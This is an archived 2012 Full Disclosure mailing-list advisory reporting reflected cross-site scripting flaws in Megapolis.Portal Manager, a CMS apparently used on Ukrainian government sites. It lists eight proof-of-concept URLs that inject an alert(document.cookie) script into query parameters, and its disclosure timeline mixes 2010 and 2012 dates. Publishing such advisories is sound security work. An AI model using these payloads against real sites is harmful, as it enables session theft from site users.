Home page logo
/

fulldisclosure logo Full Disclosure mailing list archives

Multiple vulnerabilities in Megapolis.Portal Manager
From: "MustLive" <mustlive () websecurity com ua>
Date: Sun, 7 Oct 2012 20:51:34 +0300

Hello list!

I want to warn you about multiple Cross-Site Scripting vulnerabilities in 
Megapolis.Portal Manager.

It's commercial CMS from Softline-IT (earlier Softline), which in 
particularly widespread among Ukrainian government sites (including 
ministry, parliament, two special services and many other web sites). In 
previous years I already wrote about multiple vulnerabilities in 
Megapolis.Portal Manager. These particular vulnerabilities were found at web 
sites of ministry and parliament.

-------------------------
Affected products:
-------------------------

Vulnerable are all versions of Megapolis.Portal Manager.

Developer of Megapolis.Portal Manager declined to fix these vulnerabilities.

----------
Details:
----------

XSS (WASC-08):

http://site/control/news?date=04.07.2012'%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

http://site/control/news?cat_id=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

http://site/control/uk/publish/category/news_left?cat_id=%27%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

http://site/control/uk/publish/category/news_left/news_left?cat_id=%27%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

http://site/control/uk/publish/category/news_left?from=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

http://site/control/uk/publish/category/news_left/news_left?from=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

http://site/control/uk/publish/category/news_left?to=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

http://site/control/uk/publish/category/news_left/news_left?to=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

------------
Timeline:
------------

2012.07 - found multiple vulnerabilities at multiple government sites, 
including web sites of ministry and parliament. In addition to all those 
holes during 2006-2012.
2012.07 - informed admins of these sites.
2012.07.13 - announced at my site about holes in Megapolis.Portal Manager.
2010.07.16 - informed developers.
2010.07.16 - developers answered, that they don't care about these holes 
(and so about all web sites on their CMS) and will not fix them.
2010.07.19 - I've disagreed with developers' position and suggest to not 
decline the support of the government sites for which they were paid.
2012.10.06 - disclosed at my site (http://websecurity.com.ua/5949/).

Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua 


_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


  By Date           By Thread  

Current thread:
  • Multiple vulnerabilities in Megapolis.Portal Manager MustLive (Oct 07)
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]